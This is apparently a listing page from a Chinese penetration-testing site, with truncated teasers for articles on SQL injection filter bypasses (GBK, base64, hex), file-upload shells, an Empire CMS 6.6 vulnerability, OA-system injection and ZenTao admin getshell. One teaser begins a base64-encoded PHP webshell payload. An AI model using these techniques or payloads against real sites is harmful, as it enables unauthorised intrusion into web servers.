此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考...
学员渗透录十三 base64变形注入+hex编码绕过
学员渗透录十三 base64变形注入 +hex编码绕过 作者:M-7N10 AD:学渗透 找暗月,暗月 欢迎你的加入。
奇葩文件上传拿shell
很多时候我们遇到的上传漏洞都是千奇百怪的 这时候我们就要发动我们优质的大脑
帝国cms 6.6漏洞
自定义页面-增加自定义页面-随便写个.php文件名,内容写:<script language="php">echo base64_decode("PD9waHAgQGV...
懒人最新OA注入漏洞+getshell
0x01 注入(好几处) Ps:感觉这种问题出现的情况非常多啊,内部本来有写过滤,但就是在某些地方不用 在用户中心的地方,因为代码基本上都相同,所以拿一处来说就好了 manage/...
禅道后台getshell(利用windows特性,快速确定文件名)
开始 python生成字典(需自己构造): 本文作者baozi|学与用
15